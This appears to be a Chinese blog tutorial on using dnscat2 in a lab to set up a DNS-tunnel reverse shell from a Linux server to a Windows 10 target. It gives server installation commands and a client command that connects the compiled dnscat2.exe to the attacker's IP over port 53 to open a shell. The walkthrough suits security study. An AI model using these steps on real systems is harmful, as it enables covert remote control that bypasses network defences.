使用dnscat2 进行dns隧道反弹shell——直连模式linux对windows

  • 直连模式:客户端直接向指定IP地址的DNS服务器发起DNS解析请求

环境搭建

搭建服务端

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server/

gem install bundler

apt-get install ruby-dev

bundle install

过程会有点慢

开启服务端

ruby ./dnscat2.rb

搭建客户端

这里首先需要在Visual Studio 2008中打开一个解决方案:client\win32\dnscat2.vcproj。然后编译就会看到client\win32\Release下有一个dnscat2.exe文件了

将这个文件上传至win10靶机运行

开启客户端

dnscat2.exe --dns server=192.168.227.128,port=53 --secret=9d42a40bfeef7cf1f781326684d4d3e0

剩下的就和linux一样,进入隧道反弹shell,然后ctrl+z返回上一层

进入弹回来的shell

相关推荐
Starry-sky(jing)4 分钟前
# Linux 下 Qt 应用无障碍自动化:记一次wx无人值守系统的架构演进
linux·qt·自动化
荒--10 分钟前
apt dpkg 命令详解
linux·服务器
zh_yt21 分钟前
auto-connect remote ssh server
运维·ssh
Lumbrologist31 分钟前
【零基础部署】Docker 部署 AutoGen 多 Agent 对话框架保姆级教程
运维·docker·容器
郑洁文43 分钟前
基于Python的Web命令执行漏洞自动化检测系统
前端·python·网络安全·自动化
嵌入式小能手1 小时前
飞凌嵌入式ElfBoard-进程间的通信之信号的发送alarm
linux
feng14562 小时前
OpenSREClaw - AI 本体论思维
运维·人工智能
用户2367829801682 小时前
Linux systemctl 服务管理命令:从 systemd 架构到实战技巧
linux
LIZHUOLONG13 小时前
linux 设备初始化
linux·运维·服务器
遇印记3 小时前
软考知识点(局域网基础)
运维·服务器·局域网